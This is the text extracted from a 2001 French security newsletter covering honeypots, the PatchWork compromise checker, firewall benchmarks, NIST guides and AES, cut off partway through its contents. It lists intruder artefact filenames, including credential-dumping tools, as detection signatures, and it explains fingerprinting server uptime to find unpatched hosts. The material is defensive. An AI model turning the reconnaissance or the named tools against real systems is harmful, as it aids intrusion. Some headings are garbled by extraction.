Veille Technologique Sécurité

Transcription

APOGEE Communications
R
dee
orrtt d
po
pp
Raap
Veille Technologique Sécurité
N
2
32
N°°3
Mars 2001
Les informations fournies dans ce document ont été collectées et compilées à partir de
sources d'origines diverses et publiquement accessibles : mailing-lists, newsgroups, sites
Web, ...
Ces informations sont fournies pour ce qu'elles valent sans garantie d'aucune sorte vis à vis
de l'exactitude, de la précision ou de la qualité de l'information. Les URL associées à certains
thèmes sont validées à la date de la rédaction du document.
Les symboles d’avertissement suivants seront éventuellement utilisés:
Site dont la consultation est susceptible de générer directement ou indirectement,
une attaque sur l’équipement de consultation, voire de faire encourir un risque sur
le système d’information associé.
Site susceptible d’héberger des informations ou des programmes dont l’utilisation
est répréhensible au titre de la Loi Française.
Aucune garantie ne peut être apportée sur l'innocuité de ces sites, et en particulier, sur la
qualité des applets et autres ressources présentées au navigateur WEB.
LLaa ddiiffffuussiioonn ddee ccee ddooccuum
meenntt eesstt rreessttrreeiinnttee aauuxx
cclliieennttss ddeess sseerrvviicceess
V
VTTS
S--R
RA
APPPPO
OR
RTT eett V
VTTS
S__EEN
NTTR
REEPPR
RIIS
SEE
Les marques et les produits cités dans ce rapport sont la propriété des dépositaires respectifs.
APOGEE Communications
1, Rue Jean Rostand
91893 ORSAY CEDEX
Pour tous renseignements
Offre de veille:
http://www.apogee-com.fr/veille
Informations:
[email protected]
© APOGEE Communications - Tous droits réservés
Mars 2001
Au sommaire de ce rapport …
PRODUITS ET TECHNOLOGIES
LES PRODUITS
5
5
AUDIT ET CONTRÔLE
5
SPECTER 5.0
PATCHWORK 1.1
5
5
PARE FEUX
7
COMPARATIF
LES TECHNOLOGIES
7
8
SYSTÈMES D'EXPLOITATION
8
NETCRAFT
8
INFORMATIONS ET LÉGISLATION
LES INFORMATIONS
10
10
GUIDES
10
ENGINEERING PRINCIPLES FOR IT SECURITY
GUIDANCE DOCUMENT ON IDS
CRYPTOGRAPHIE
AES
10
11
11
11
AUDIT ET CONTRÔLE
12
ISO17799 - COBRA
12
LOGICIELS LIBRES
LES SERVICES DE BASE
LES OUTILS
14
14
14
NORMES ET STANDARDS
LES PUBLICATIONS DE L'IETF
16
16
LES
LES
RFC
DRAFTS
16
16
NOS COMMENTAIRES
24
LES RFC
24
RFC 3067
24
LES DRAFTS
24
DRAFT-COFFEYSTRAIN-DNSEXT-PRIVATEDNSTLD-00
DRAFT-ESIBOV-DNSOP-SUPPRESS-QUERIES-00
DRAFT-IETF-DNSEXT-OBSOLETE-IQUERY-00
ALERTES ET ATTAQUES
ALERTES
GUIDE DE LECTURE
FORMAT DE LA PRÉSENTATION
SYNTHÈSE MENSUELLE
ALERTES DÉTAILLÉES
AVIS OFFICIELS
CIAC
CISCO
COMPAQ
FREEBSD
HP
IBM
IMAPD
ISS
LINUX
LINUX CALDERA
LINUX DEBIAN
LINUX REDHAT
LINUX SUSE
MICROSOFT
MICROSOFT / NIPC
MIT/KERBEROS
NETSCAPE
NORTEL
OPENBSD
Veille Technologique Sécurité N°32
24
25
25
26
26
26
27
27
28
28
28
28
28
29
29
30
30
30
30
31
31
31
31
31
32
32
32
32
32
Page 2/51
Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Mars 2001
PALM OS
SSH
VIRUS / VERS
ZOPE
33
33
33
33
ALERTES NON CONFIRMÉES
33
CGI/PERL
DGUX
FTP
MICROSOFT
NETSCAPE
MYSQL
NOVELL
QUALCOMM
SUN
33
33
34
34
34
34
34
34
34
AUTRES INFORMATIONS
35
REPRISES D'AVIS
35
ET
CORRECTIFS
CIAC
COMPAQ
FREEBSD
HP
LOTUS/IBM
LINUX DEBIAN
LINUX MANDRAKE
LINUX REDHAT
LINUX SUSE
NETBSD
PGPI
TIS
VIRUS
35
36
36
36
36
36
36
37
37
37
37
37
38
CODES D'EXPLOITATION
38
BULLETINS ET NOTES
38
ATSTAKE
38
AUSCERT
AXENT
CERT
ISS
NIPC
SYMANTEC
38
38
38
38
39
39
ATTAQUES
40
OUTILS
40
TECHNIQUES
48
SUBSEVEN V2.2 VBS WORM GENERATOR CHKROOTKIT
TRIANGLE BOY DÉVOILÉ
40
42
45
46
LUCKROOT - HONEYNET SCAN OF THE MONTH
48
Page 3/51
Mars 2001
Le mot de la rédaction …
Une part importante de ce rapport de veille est consacrée aux attaques et outils
associés, conséquence directe d'une actualité riche en événements:
-
diffusion du virus Anna Kournikova (CERT CA-2001-03),
-
nouvelle version de SubSeven (X-Force #73),
-
nombre grandissant d'attaques visant à prendre le contrôle de systèmes
LINUX au moyen de code mobiles tels Ramen (CERT IN-2001-01) ou encore
LION (NIPC 01-005).
Autre fait marquant, l'activité de normalisation semble avoir atteint sa vitesse
de croisière dans les instances américaines avec la publication de 3 documents1
par le NIST dont la version de travail du standard AES et la diffusion de 25
nouveaux drafts IETF ayant directement trait à la sécurité. Mais, dans le même
laps de temps, seuls 3 RFC portant sur la sécurité ont été publiés !
L'équipe de Veille Technologique
1
Ce chiffre s'élève à 6 documents au jour de la diffusion du présent Rapport.
Page 4/51
Mars 2001
PR
RO
OD
DU
UIIT
TS
SE
ET
T TE
EC
CH
HN
NO
OL
LO
OG
GIIE
ES
S
LES
PRODUITS
AUDIT ET CONTROLE
SPECTER 5.0
Description
Parmi toutes les techniques utilisées dans le domaine de la détection d'intrusion, la technique 'proactive' consistant à
délibérément installer un système piégé, ou 'Honey Pot', était restée jusqu'à maintenant l'apanage des laboratoires privés ou gouvernementaux - travaillant dans le domaine de l'analyse des attaques.
Historiquement développé par Clifford Stoll en 1988 lors de sa traque contre le CCC allemand (aventure relatée
dans l'excellent ouvrage 'The Cuckoo's Egg') puis mis en pratique en 1991 par B.Cheswick et S.Bellovin avec leur
système de prison virtuelle chez ATT (une autre aventure à lire dans 'An Evening with Berferd'), le système piégé
permet d'étudier sans aucun risque non seulement les différentes attaques susceptibles d'être perpétrées contre un
système mais aussi l'évolution et l'adaptation du comportement du pirate face à un problème donné et modifiable à
volonté … l'observation d'un pirate à travers une glace sans tain …
Se positionnant en concurrent de l'outil libre Deception ToolKit ('F.Cohen') et du produit commercial Cybercop
Sting ('NAI/Pgp'), le produit SPECTER V5.0 est développé par la société Suisse NETSEC.
Fonctionnant en environnement Windows NT
ou 2000, SPECTER est capable de simuler le
fonctionnement de 13 services - dont 3
chevaux de Troie et 7 services piégés - sur
11 plates-formes différentes:
Services émulés: Systèmes émulés:
SMTP
Windows 98
FTP
Windows NT
TELNET
Windows 2000
FINGER
Linux
POP3
Solaris
IMAP4
Unix Tru64
HTTP
NeXTStep
DNS
Irix
SUN RPC
Unisys Unix
SNMP TRAP
Aix
NETBUS
MacOS
SUB SEVEN
BO2K
Plusieurs options de configuration permettent d'adapter l'émulation au contexte d'analyse souhaité:
Qualité de la configuration du système d'exploitation selon 5 niveaux,
Qualité des mots de passe contenus dans les fichiers servis à l'attaquant selon 7 niveaux représentatifs.
Le produit offre la possibilité de capturer, dans des conditions de déclenchement hélas non documentées, diverses
informations permettant d'identifier l'agresseur: bannières SMTP, Telnet, Ftp, Http, Sondage de port et TraceRoute.
En l'absence de versions de démonstration ou d'évaluation, il ne nous a pas été possible de valider les fonctionnalités
de ce produit d'un coût restant abordable -$899- et fort prometteur si l'on se réfère aux données techniques fournies.
Complément d’information
http://www.specter.com
PATCHWORK 1.1
Description
Mi-mars, les principaux organismes d'alerte Américains révèlent l'existence d'une attaque menée sur le long terme par
une organisation de pirates localisée en Europe de l'Est. Depuis maintenant plus d'un an, cette organisation aurait
systématiquement sondé les serveurs hébergeant un site de commerce électronique dans le seul but d'acquérir les
informations concernant les clients, dont bien entendu, les données bancaires personnelles. Les derniers chiffres
annoncés font état du pillage d'une quarantaine de sites, pillage ayant permis de collecter plus d'un million de numéro
de cartes bancaires.
Une telle attaque a été rendue possible par la négligence des exploitants des serveurs fonctionnant en environnement
Page 5/51
Mars 2001
NT4.0 / SQL Server / IIS, la majorité de ces serveurs n'ayant fait l'objet d'aucune mise à jour malgré les
avertissements répétés des centres d'alertes mondiaux. Ainsi, quatre vulnérabilités, dont la plus ancienne a été
découverte en Novembre 99, ont été exploitées pour prendre le contrôle des bases de données des sites attaqués.
Afin d'éradiquer au plus vite ce problème endémique, le SANS
Institute a annoncé la mise à disposition d'un outil de test
normalement réservé aux membres du CIS (Center for
Internet Security) et dénommé PatchWork.
Présenté par son auteur Steve Gibson sous l'intitulé 'The
Tool to Test For Windows NT Vulnerabilities Used By
Russian Hackers' pouvant porter à confusion (les hackers
Russes ont-ils utilisé l'outil ou simplement exploité les
vulnérabilités ?), Patchwork 1.1 prend la forme d'un
exécutable WIN32 de faible volume (30ko).
Notons, la chose est encore suffisamment rare pour quelle
mérite d'être signalée, que cet exécutable est signé par un
certificat émis par Verisign, certificat qui n'est hélas révélé
qu'à la condition d'accepter d'exécuter le programme à partir
d'un navigateur.
Dés son lancement, et sans en informer l'utilisateur, cet utilitaire
engage une première phase d'analyse du système durant laquelle
la vulnérabilité potentielle du système est vérifiée.
Cette phase a pour objectif de déterminer si les correctifs
correspondants aux vulnérabilités exploitées ont été mis en
place:
- MS99-025: Unauthorized Access to IIS Servers through
Open Database Connectivity (ODBC) Data
Access with Remote Data Service (RDS)
- MS00-008: Registry Permissions Vulnerability
- MS00-014: SQL Query Abuse Vulnerability
- MS00-086: Web Server File Request Parsing
L'utilisateur est averti du bon fonctionnement de l'utilitaire par
l'apparition d'une fenêtre l'informant des résultats de l'analyse.
La seconde phase d'analyse doit alors être explicitement
initialisée par l'utilisateur. Elle permet de vérifier que le système
n'a pas été compromis par la vague d'attaque.
Les volumes logiques du système sont balayés, répertoire par
répertoire, afin de rechercher la présence des fichiers installés ou
modifiés lors de l'attaque. La 'signature' actuellement utilisée est
constituée de deux listes de noms de fichiers:
- Fichiers directement liés à cette attaque: ntalert.exe,
sysloged.exe, tapi.exe 20.exe, 21.exe, 25.exe, 80.exe,
139.exe, 1433.exe, 1520.exe, 26405.exe, i.exe
- Fichiers souvent installés après une attaque: omscan.exe,
mslom.exe, lsaprivs.exe, pwdump.exe, serv.exe, smmsniff.exe
Bien que le rôle exact des exécutables de la première liste ne soit
pas documenté, les noms 'numériques' attribués à certains
d'entre eux laissent supposer qu'il puisse s'agir de proxies
interceptants les flux échangés sur les ports de même nom:
20: FTP (Data)
- 25:SMTP
- 139 : SESSION (NetBios) 1520 : Atm Zip !
21: FTP (Commandes) - 80:WEB
- 1433 : SQL-Server
- 26405 : Non répertorié
L'avantage majeur de cet utilitaire est d'automatiser la phase de prévention (vérification de la configuration) et de
diagnostic (recherche des traces de compromissions) bien qu'aucune option de mise à jour des signatures ne soit
présente.
On notera, pour l'anecdote, le style caractéristique de Steve Gibson qui peut hélas porter préjudice à la crédibilité
d'initiatives pourtant louables. Ainsi, et à titre d'exemple, le faible volume (30Ko) revendiqué par S.Gibson comme
résultant uniquement d'un programme qui 'was hand crafted -- byte by byte -- in 100% pure 32-bit Intel assembly language' - cf
l'onglet 'HELP' de l'utilitaire - doit aussi être mis au crédit de la compression préalable de l'exécutable (d'un volume
initiale 110Ko). Dans un domaine aussi critique que celui de la détection d'une compromission, domaine pour lequel la
plus grande réactivité est attendue, optimiser un programme à l'octet près s'apparente à une perte de temps
inadmissible. Le style de l'écriture importe peu lorsqu'il s'agit de diffuser au plus vite un outil d'aide quand bien même
celui-ci serait écrit en shell, perl ou même visual script !
Complément d'information
http://www.sans.org/newlook/alerts/NTE-bank.htm
http://www.cisecurity.org/tools/patchwrk.exe
Page 6/51
Mars 2001
http://grc.com/pw/patchwork.htm
PARE FEUX
COMPARATIF
Description
Le groupement 'Network World' a publié les résultats d'un banc d'essai destiné à analyser le
comportement des produits de type 'pare-feux' récents sur un réseau à très haut débit. Afin de
conserver un périmètre matériel raisonnable, seuls les produits coûtant moins de $20000 ont été
retenus. Network World annonce avoir soumis ces produits à 21 tests différents sur une plateforme constituée de plusieurs switchs, d'un PC PIII bi-processeur cadencé à 650Mhz et de divers
logiciels dont la suite SmartFlow et SmartTCP de la société Spirent.
Ont été testés les produits suivants, classés par ordre alphabétique sur le champ fournisseur:
(A) NETWORK ASSOCIATES
PIX525
(A) CISCO
WebShield(1)
BorderManager (L) NOVELL
Firewall-1
(L) CHECKPOINT
IP650
(A) NOKIA
ETrust
(F) COMPUTER ASSOCIATES
SideWinder
(L) SECURE COMPUTING
KnightStar
(A) CYBERGUARD
SonicWall ProVX (A) SONICWALL
Enternet
(A) ENTERNET
Raptor
(L) SYMANTEC
Brick
(A) LUCENT
AppSwitch3500 (A) TOPLAYER
NetScreen-100 (A) NETSCREEN
FireBox II
(A) WATCHGUARD
CyberWallPlus (A) NETWORK-1
(1):
la gamme de produit a été dernièrement renommée en PGP e-ppliance
Nota: un click sur le nom du produit permet d'accéder directement à la page de présentation sur le site de l'éditeur.
L'article publié reste hélas très évasif sur les caractéristiques exactes de certains produits pour lesquels plusieurs
versions, voire plusieurs plates-formes matérielles, peuvent être sélectionnées. Afin de faciliter la comparaison, la
liste précédente précise la catégorie de rattachement de chaque produit au moyen d'une lettre:
- Lettre A: Produit logiciel embarqué, optimisé et préconfiguré (dénommé 'Appliance' par la majorité des éditeurs)
- Lettre L: Produit purement logiciel
- Lettre F: Produit inscrit dans une famille de produits
Cette classification, non utilisée dans l'article original, apporte un éclairage particulier sur la sélection effectuée (et
incidemment sur le marché actuel): 10 produits sur les 16 testés sont des appliances. Ce constat, corrélé avec les
résultats de l'étude, démontre - et cela n'est pas une nouveauté - que les meilleurs performances sont atteintes
lorsque le matériel est optimisé pour les fonctions attendues, cas typique des appliances.
Sans reprendre en détail les résultats de l'étude (le lecteur se reportera à l'article original) il est intéressant de mettre
en évidence les produits classés parmi les 6 premiers sur les 3 catégories de test retenues:
Débit
Nb de
Pic de
Moyenne
Brut
Connexions
charge
non pond.
Nom
NetScreen
3
1
4
2,7
Cisco
5
3
1
3,0
Cyberguard
6
5
2
4,3
TopLayer
1
2
11
4,7
Nokia
2
9
5
5,3
Enternet
7
4
7
6,0
Lucent
4
7
10
7,0
Checkpoint
10
10
3
7,7
Watchguard
9
6
8
7,7
Network Assoc.
11
14
6
10,3
Secure Comp.
8
15
9
10,6
SonicWall
12
11
12
11,6
Comp. Assoc.
14
8
14
12
Novell
15
12
15
14
Symantec
13
16
13
14
NetWork-1
16
13
16
15
Rappelons que les tests auxquels les produits ont été soumis avaient pour objectif de comparer les performances en
terme de débit et de charge supportée sans préjuger de la qualité de la protection et du niveau de sécurité offert.
http://www.idg.net/ic_473844_1794_9-10000.html
http://www.spirentcom.com/smartbits/solutions/software.asp
Page 7/51
Mars 2001
LES
TECHNOLOGIES
SYSTEMES D'EXPLOITATION
NETCRAFT
Description
Le site 'NetCraft', établi depuis 1999, s'est spécialisé dans la surveillance et l'analyse de la qualité de service de tout
type de site WEB. Annonçant une base contenant les statistiques de plus de 27 Millions de sites, NetCraft n'a jamais
réellement dévoilé les techniques d'acquisition non intrusives utilisées pour établir la durée de fonctionnement sans
interruption (ou plus simplement Uptime dans le jargon informatique) des systèmes surveillés.
Un article publié dans la liste Bugtraq propose une explication plausible basée sur l'exploitation des informations
liées à l'option TCP 'Timestamp' décrite dans le RFC 1323 'TCP Extensions for High Performance'. Ce RFC
décrits deux nouveaux mécanismes permettant de résoudre le problème posé par l'utilisation du protocole TCP sur
des liaisons à très hauts débits, les mécanismes initiaux de gestion des flux et de retransmission devenant inefficaces
lorsque les débits atteignent le gigabit.
Deux nouveaux champs optionnels exploitables au niveau TCP ont ainsi été définis, le premier dit 'WSopt' (TCP
Windows Scale Option) permettant d'augmenter la taille de la fenêtre d'acquittement, le second dit 'TSopt' (TCP
Timestamps Option) permettant d'affiner la gestion des temps de transits (RTT). Cette dernière option consiste à
transmettre un horodatage dans chaque segment transmis, le destinataire renvoyant la valeur reçue dans chaque
paquet d'acquittement ACK. Un calcul simple permet alors à chacun de connaître le temps de transit moyen.
La stratégie de génération de l'horodatage n'est pas explicitement spécifiée par le RFC qui précise seulement:
The timestamp value to be sent in TSval is to be obtained from a (virtual) clock that we call the "timestamp clock".
Its values must be at least approximately proportional to real time, in order to measure actual RTT.
Dans ces conditions, de nombreuses implémentations
utilisent un compteur remis à zéro lors du démarrage du
système et incrémenté à une fréquence multiple de la
précision requise pour le calcul du temps de transit.
La valeur transmise est alors proportionnelle à la durée
écoulée depuis la dernière initialisation quant elle n'est pas,
pour certains systèmes, identique à cette durée exprimée
en 'ms'.
L'échantillonnage de cette valeur à intervalles réguliers
permettra donc d'interpoler une courbe (en pratique une
droite) dont l'origine déterminera la date de la dernière
réinitialisation du système.
Notons sur le tableau suivant la remarquable similitude entre les résultats de l'étude de Bret McDanel et la liste des
systèmes fournissant une information fiable proposée par NetCraft, similitude qui tendrait à prouver que les
données transmises via l'option TimeStamp TCP sont bien exploitées par NetCraft.
Informations en provenance de NetCraft
AIX
AmigaOS
AS/400
BSD/OS
CISCO
CONVEX
DG/UX
FreeBSD
HP-UX
IRIX
Linux 2.1
MacOS
MaxOSX
NetBSD
NetWare
New-OS
NT3
NT4
OpenBSD
OS/2
OS/390
SCO Unix
Solaris
NON
NON
NON
OUI
N/A
N/A
NON
OUI Config. spécifique version 3 et plus
OUI Versions récentes
OUI
OUI Kernel 2.1 et suivants sauf sur alpha
NON
OUI
NON
NON
NON
OUI Jusqu'au SP3
NON
NON
NON
OUI Solaris 2.6 et suivant
Etude de Bret McDanel
OUI
N/A
N/A
OUI
OUI
OUI
N/A
OUI
OUI
OUI
OUI
OUI
N/A
N/A
NON
N/A
NON
NON
OUI
N/A
N/A
N/A
OUI
Config. Spécifique
Version 11.0
2.1.15
Config. Spécifique version 9.x
Config. Spécifique version 5.3 et plus
Kernel 2.1 et suivant
Versions 2.1 et 3.0
Solaris 2.6 et suivant
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Page 8/51
Mars 2001
SUNOS4
True64
VM
W2K
W95
NON
NON
NON
OUI
NON
Windows 2000
NON
NON
N/A
OUI
NON
24
25
26
27
28
Cependant et de notre point de vue, l'information fournie dans l'option TimeStamp TCP, ne peut, seule, expliquer la
justesse constatée des analyses. La précision atteinte doit probablement résulter de l'utilisation de multiples sources
d'information, sélectionnées et corrélées en tenant compte du type de système d'exploitation sous-jacent.
Ce technique d'acquisition non intrusive du temps de fonctionnement est exploitée par le fameux utilitaire de sondage
'nmap' dans version 2.54b22 pour déterminer la stabilité du système cible. En considérant qu'un système doit être
réinitialisé lors de chaque mise à jour majeur - passage d'un correctif système par exemple - cette information
permet éventuellement d'affiner l'identification des systèmes potentiellement vulnérables !
http://www.netcraft.com
http://www.securityfocus.com/archive/1/168637
ftp://fto.isi.edu/in-notes/rfc1323.txt
http://www.insecure.org/nmap/
Page 9/51
Mars 2001
IN
NF
FO
OR
RM
MA
AT
TIIO
ON
NS
SE
ET
T LE
EG
GIIS
SL
LA
AT
TIIO
ON
N
LES
INFORMATIONS
GUIDES
ENGINEERING PRINCIPLES FOR IT SECURITY
Description
Intitulé Engineering Principles for Information Technology Security , ou EPITS, cette ébauche de standard de 27
pages publiée par le NIST se propose d'établir les principes élémentaires applicables à la conception de systèmes
sécurisés.
S'appuyant sur les 8 principes et 14 procédures d'organisation décrits dans le standard SP800-14 'Generally
Accepted Principles and Practices for Securing Information Technology Systems', l'EPITS spécifie 32
principes techniques en tenant compte de la stratégie de protection en profondeur, ou Defense-in-depth, élaborée
par le DoD.
Chaque principe est positionné sur les 5 phases du cycle de vie d'un système:
le démarrage
(initiation),
le développement
(development/acquisition),
le déploiement
(implement),
l'exploitation
(operational/maintenance),
la destruction
(disposal).
La lecture de ce 'Guide' est fortement conseillée, les 32 principes étant simples (pour ne pas dire évidents mais n'est
ce pas là une preuve de la qualité du travail effectué ?), efficaces et parfaitement adaptés à la gestion de la sécurité
d'un système d'information 'civil'.
1. Establish a sound security policy as the “foundation” for design
2. Clearly delineate the physical and logical security boundaries governed by associated security policies.
3. Reduce risk to an acceptable level.
4. Assume that external systems are insecure.
5. Identify potential trade-offs between reducing risk
6. Ensure no single point of failure.
7. Implement tailored system security measures to meet organizational security goals.
8. Design and implement security measures to be proportional to the program risks and mission impact.
9. Strive for simplicity.
10. Design and operate an IT system to prevent vulnerability and to be resilient in response.
11. Treat security as an integral part of the overall system design.
12. Minimize the system elements to be trusted.
13. Implement security through a combination of measures distributed physically and logically.
14. Provide assurance that the system is, and continues to be, resilient in the face of expected threats.
15. Isolate system elements to limit or contain vulnerabilities.
16. Formulate security measures to address multiple overlapping information domains.
17. Isolate public access systems from mission critical resources (e.g., data, processes, etc).
18. Use boundary mechanisms to separate computing systems and network infrastructures.
19. Where possible, base security on open standards for portability and interoperability.
20. Implement and employ layered protections to mitigate vulnerabilities in COTS products.
21. Use common language in developing security requirements.
22. Design and implement audit mechanisms to detect unauthorized use and to support incident investigations.
23. Design security to allow for regular adoption of new tech. , including a secure & logical tech. upgrade process.
24. Authenticate users and processes to ensure appropriate access control decisions are made across domains.
25. Use unique identities to ensure accountability.
26. Use roles to control user and process access.
27. Maintain traceability from security goals and requirements to security mechanisms.
28. Ensure the integrity, confidentiality, and availability of information being processed, in transit, and in storage.
29. Strive for operational ease of use
30. Develop and exercise contingency or disaster recovery procedures to ensure appropriate availability.
31. Consider custom products to achieve adequate security.
Page 10/51
Mars 2001
32. Ensure proper security in the shutdown or disposal of a system.
Le NIST informe les lecteurs que tout commentaire permettant de faire évoluer ce document sera le bienvenu.
http://csrc.nist.gov/publications/drafts.html
GUIDANCE DOCUMENT ON IDS
Description
Avec ce document de travail de 51 pages dénommé 'Guidance Document on Intrusion Detection Systems', le
NIST nous prouve l'excellence et la qualité de ses publications. Destiné à accompagner les agences Fédérales
Américaines dans leur travail quotidien d'investigation, ce Guide propose un état de l'art irréprochable des systèmes
dits de 'détection d'intrusion'.
Le sommaire de ce document est reproduit ci-après:
1. Introduction
2. Overview of Intrusion Detection Systems
2.1. What is intrusion detection?
2.2. Why should I use Intrusion Detection Systems?
2.3. Major types of IDSs
2.4. Tools that Complement IDSs
3. Advice on selecting IDS products
3.1. Technical and Policy Considerations
3.3. IDS Product Features and Quality
4. Deploying IDSs
4.1. Deployment strategy for IDSs
4.2. Deploying Network-Based IDSs
4.3. Deploying Host-Based IDSs
4.4. Alarm strategies
5. Strengths and Limitations of IDSs
5.1. Strengths of Intrusion Detection Systems
5.2. Limitations of Intrusion Detection Systems
6. Advice on dealing with IDS output
6.1. Typical IDS Output
6.2. Handling Attacks
7. Computer Attacks and Vulnerabilities
7.1. Attack Types
7.2. Types of Computer Attacks Commonly Detected by IDSs
7.3. Types of Computer Vulnerabilities
8. The Future of IDSs
9. Conclusion
Appendix A - Frequently Asked Questions about IDSs
Appendix B - IDS resources
La lecture de ce Guide par les responsables techniques en charge de la gestion des incidents est fortement
recommandée. Notons que les chapitres '2.3 - Major Types of IDSs', '4.2 - Deployement Strategy for IDSs' et '5
- Strengths and Limitations of IDSs' traitent de questions couramment soulevées dans ce domaine.
Le seul regret que nous ayons à formuler concerne l'absence de règles, ou de principes de sélection directement
applicables. Ainsi, si les avantages/inconvénients liés au positionnement d'une sonde IDS autour d'un Pare-feu sont
correctement présentés, aucune règle concrète d'architecture et de sélection de l'une ou l'autre des options n'est
proposée.
http://csrc.nist.gov/publications/drafts/idsdraft.pdf
CRYPTOGRAPHIE
AES
Description
Le draft de la norme FIPS portant sur l'algorithme AES - le successeur du DES - a fait l'objet d'un appel à
commentaires par le NIST pour une période de 90 jours se terminant le 29 Mars. A l'issue de cette période, le
document de travail sera éventuellement revu avant d'être amendé puis promulgué au niveau de Federal
Information Processing Standard. Le NIST espère finaliser ce processus pour l'été 2001.
Le document de travail publié, intitulé 'Draft FIPS for the AES', commence par rappeler la terminologie, les
conventions de notation et les principes mathématiques nécessaires à la compréhension de la description de
l'algorithme. La spécification de l'algorithme est ensuite abordée en détaillant les fonctions de chiffrement, de
déchiffrement et d'expansion de clef. Les points spécifiques liés à l'implémentation sont ensuite traités, le document
Page 11/51
Mars 2001
se terminant par une annexe contenant divers vecteurs de tests.
Dans l'état actuel du processus de normalisation, l'AES est décrit comme un algorithme de chiffrement par blocs de
128 bits susceptible d'utiliser une clef secrète de longueur comprise entre 128 et 256 bits. En pratique, et afin de
faciliter l'inter-opérabilité, trois longueur de clefs ont été retenues qui permettent de définir trois combinaisons
normalisées:
- AES-128 (clef de 128 bits),
- AES-192 (clef de 192 bits) et
- AES-256 (clef de 256 bits).
Pour prétendre être conforme au standard FIPS-AES, une implémentation devra supporter au moins l'une de ces
combinaisons.
En pratique, l'association de ces 3 combinaisons avec les quatre modes d'utilisation classiques d'un algorithme de
chiffrement par bloc - OFB, CBC, OFB et CFB - conduit à définir et enregistrer les 12 identifiants d'objet (ou OID)
suivants:
- aes1
AES-128 mode ECB
- aes21
AES-192 mode ECB
- aes41
AES-256 mode ECB
- aes2
AES-128 mode CBC
- aes22
AES-192 mode CBC
- aes42
AES-256 mode CBC
- aes3
AES-128 mode OFB
- aes23
AES-192 mode OFB
- aes43
AES-256 mode OFB
- aes4
AES-128 mode CFB
- aes24
AES-192 mode CFB
- aes44
AES-256 mode CFB
IN i
AES
AES
OUT i
ECB
Electronic Code Book
IN i
OUT i-1
IN i+1
AES
AES
OUT i
CBC
Cipher Book Chaining
IN i
OUT i
k
CFB
Cipher Feedback Block
AES
AES
IN i
OUT i
k
OFB
Ouput Feedback Block
AES
AES
AUDIT ET CONTROLE
ISO17799 - COBRA
Description
La passage tant attendu de la norme Anglaise BS7799 'Code of practice for information security management'
en Norme Internationale ISO17799 s'est accompagné d'une soudaine activité tant dans le domaine du logiciel que
celui du conseil et des portails WEB !
Ainsi, l'éditeur spécialisé 'CA-Systems' annonce la
disponibilité d'une base de connaissances conforme
ISO17799 et exploitable par son logiciel d'aide à
l'analyse de risque 'COBRA' (un paquetage de 15Mo).
Présenté comme un outil exploitable sans aucune
connaissance ou formation préalable, la version 3 de
COBRA prend la forme d'une interface graphique
générique et d'un ensemble de bases de connaissances
formant le cœur de la méthodologie. Celle-ci utilise un
formalisme de type QCM, les questions étant dictées par
le type d'analyse sélectionnée.
Chaque base de connaissance est constituée de plusieurs
modules correspondants à différents thèmes d'analyse et
pouvant être sélectionnés indépendamment.
Si nécessaire, un questionnaire spécifique pourra être
créé par sélection de tout ou partie des modules contenus
dans les différentes bases de connaissance.
Une analyse de risque est conduite en trois étapes successives:
Page 12/51
Mars 2001
1.
Initialisation: l'auditeur sélectionne le type d'analyse et créé
un dossier référencé par une description textuelle et un
identifiant unique. L'état d'avancement de chaque dossier est
conservé permettant ainsi l'arrêt et la reprise d'une analyse.
2. Traitement: l'intervenant sélectionne un module, indique sa
qualité et son nom. Il peut ensuite engager la phase de
renseignement des différentes rubriques sous la forme de
questions/réponses uniques ou à choix multiples. Les
questions ouvertes ne sont pas supportées car ne permettant
pas l'automatisation de l'analyse.
Cette étape sera finalisée lorsque tous les modules
sélectionnés pour le dossier auront été complétés.
La présence d'une fonction de saisie assistée des réponses
facilite notablement le déroulement des entretiens. Bien
entendu, le(s) questionnaire(s) peu(ven)t être imprimé(s)
autorisant ainsi un traitement en temps différé.
3. Synthèse:
l'intervenant
sélectionne
les
options
de
présentation et génère un rapport qui peut ensuite être
imprimé.
Un outil complémentaire, Module Manager (paquetage de 5Mo), autorise la création, la modification et même la
traduction de modules, permettant ainsi l'utilisation de COBRA dans un environnement spécifique.
COBRA Professionnel est livré avec 5 bases de connaissances couvrant les principaux domaines de l'analyse de
risque appliquée aux Systèmes d'Information, d'autres bases spécialisées pouvant être acquises (Business Continuity,
Data Protection Legislation, …):
ISO17799
(Environnement 'BS7799')
e-Commerce Infrastructure (Environnement 'Risk Consultant')
IT Security
(Environnement 'Risk Consultant')
Operational Risk
Quick Risk
Remarquablement conçu, COBRA pêche cependant par l'absence regrettable d'une documentation détaillant le
contenu des différentes bases de connaissances et des modules associés.
http://www.securityauditor.net/iso17799/solution.htm
http://www.ca-systems.zetnet.co.uk/cobdown.htm
http://www.security.kirion.net/securite/
http://www.iso17799software.com/
Page 13/51
Mars 2001
LO
OG
GIIC
CIIE
EL
LS
S LIIB
BR
RE
ES
S
LES
SERVICES DE BASE
Les dernières versions des services de base sont rappelées dans les tableaux suivants. Nous conseillons
d’assurer rapidement la mise à jour de ces versions, après qualification préalable sur une plate-forme
dédiée.
RESEAU
Nom
BIND
DHCP
NTP4
WU-FTP
Fonction
Ver.
Gestion de Nom (DNS)
Serveur d'adresse
Serveur de temps
Serveur de fichiers
9.1.1
3.0b2pl23
4.0.99k
2.6.1
Date
Source
28/03/01
22/03/01
20/07/00
02/07/00
http://www.isc.org/products/BIND
http://www.isc.org/products/DHCP/dhcp-v3.html
http://www.eecis.udel.edu/~ntp
http://www.wu-ftpd.org
MESSAGERIE
Nom
IMAP4
POP3
SENDMAIL
Fonction
Ver.
Relevé courrier
Relevé courrier
Serveur de courrier
2000c
3.1
8.12.0b5
Fonction
Ver.
Date
Source
20/02/01 http://www.washington.edu/imap/documentation/RELNOTES.html
07/04/00 http://www.eudora.com/qpopper_general/
11/03/01 http://www.sendmail.org
WEB
Nom
APACHE
ModSSL
MySQL
SQUID
1.3.19
2.0.14a
API SSL Apache 1.3.17 2.8.1
Base SQL
3.23.36
Cache WEB
2.4s1
Serveur WEB
Date
Source
28/02/01
10/03/01
03/03/01
28/03/01
20/03/01
http://httpd.apache.org/dist
http://www.modssl.org/
http://www.mysql.com/downloads/index.html
http://www.squid-cache.org
AUTRE
Nom
Fonction
Ver.
INN
MAJORDOMO
OpenCA
OpenLDAP
Gestion
Gestion
Gestion
Gestion
2.3.1
1.94.5
0.2.0-5
2.0.7
LES
des news
des listes
de certificats
